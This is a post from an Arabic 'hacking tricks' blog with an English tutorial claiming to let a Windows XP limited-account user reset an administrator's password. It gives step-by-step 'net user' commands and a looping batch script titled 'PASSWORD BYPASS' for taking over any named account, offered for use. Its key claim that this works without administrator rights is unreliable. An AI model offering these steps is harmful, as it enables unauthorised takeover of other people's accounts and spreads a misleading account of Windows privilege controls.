اعلان

Website

المدونة

ملاحظات يجب قراءتها:

1. نتبرئ من استخدام أي موضوع في المدونة في طريق الحرام أو ضد المسلمين.
2. إن لم تجد الموضوع الذي بحثت عنه في محرك البحث، استخدم البحث الداخلي في المدونة.
3. هناك مراكز رفع ملفات تحتاج الى استعمال بروكسي للتحميل المجاني دون عمل حساب مدفوع مثل مركز رفع uploading.com
4. نعتذر عن عدم توفر بدائل لبعض الروابط المفقودة
5. الرجاء فحص الملفات جيداً قبل التشغيل فيما يخص أدوات الهاكرز و الفيديو..الخ
6. ليست كل البرامج كاملة و ليست كل البرامج تحتاج الى تسجيل!!؟؟
7. عزيزي الزائر تشرفنا بزيارتك، و أعلم أنك لست أول زائر و لن تكون الاخير بإذن الله تعالى، تمتع بتصفح المدونة دون مشاكل بإذن الله...
8. لا تنس استخدام (رسائل اقدم) لرؤية باقي مواضيع التصنيفات

انشاء المدونة

تم انشاء المدونة في:

07\01\2009

Black ice

كل عام و أنتم بألف خير بمناسبة مرور 4 سنوات على انشاء المدونة و الحمدلله

ĬŖŞĤ@ĮĐ مدونة الخدع و الشروحات إرشيد الجرايدة ĬŖŞĤ@ĮĐ

Changing admin password in limited account

 change an admin password useing a limited account. This is for Windows XP, but I dont know about any of the older OSes


Way number 1: Command Prompt

A1. Go to Start > Run... > type in "cmd.exe"
RESULT: Brings up the Command Prompt window.

OR

A1. Bring up notepad, type in "Start cmd.exe", then go to File > Save as... > Save it as "cmd.bat"
RESULT: Brings up the Command Prompt window.

A2. Type in "net user"
RESULT: Shows you all accounts on computer

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Lets just say you chose an account called Alex
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

A3. Type in "net user Alex *" (the " *" is very important to remember. Without it, you wont change the password.)
RESULT: It prompt for password

A4. Type in your new password, press enter, than conferm it. Both will be invisible when you type them.
RESULT: Password changed

A5. You may now exit out of command prompt and log into the admin/other account with the password you chose. If you pressed enter through both of them, there will no longer be a password.

Congradulations! You just hacked your own computer through a limited account! Once you log into that admin account, you can control anything bascicly.


+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+_+


Way number 2: Batch file

B1. Open Notepad
RESULT: Notepad opens

B2. Type i the following and save it as "whateveryouwant.bat" to make it into a batch file. The .bat is needed to be a batch file.

@echo off
:A
cls
echo ===============================================================================
echo ================================PASSWORD BYPASS================================
echo ===============================================================================
set /p n=Account:
net user %n% *
pause
Goto A

RESULT: You have a nice little batch file

B3. Double click the batch file to launch it. In it, type in the account name you want to hack, then it will prompt for the password just like in Way number 1.
RESULT: You get to change the password.


===========================================================================
===========================================================================
===========================================================================

ليست هناك تعليقات:

إرسال تعليق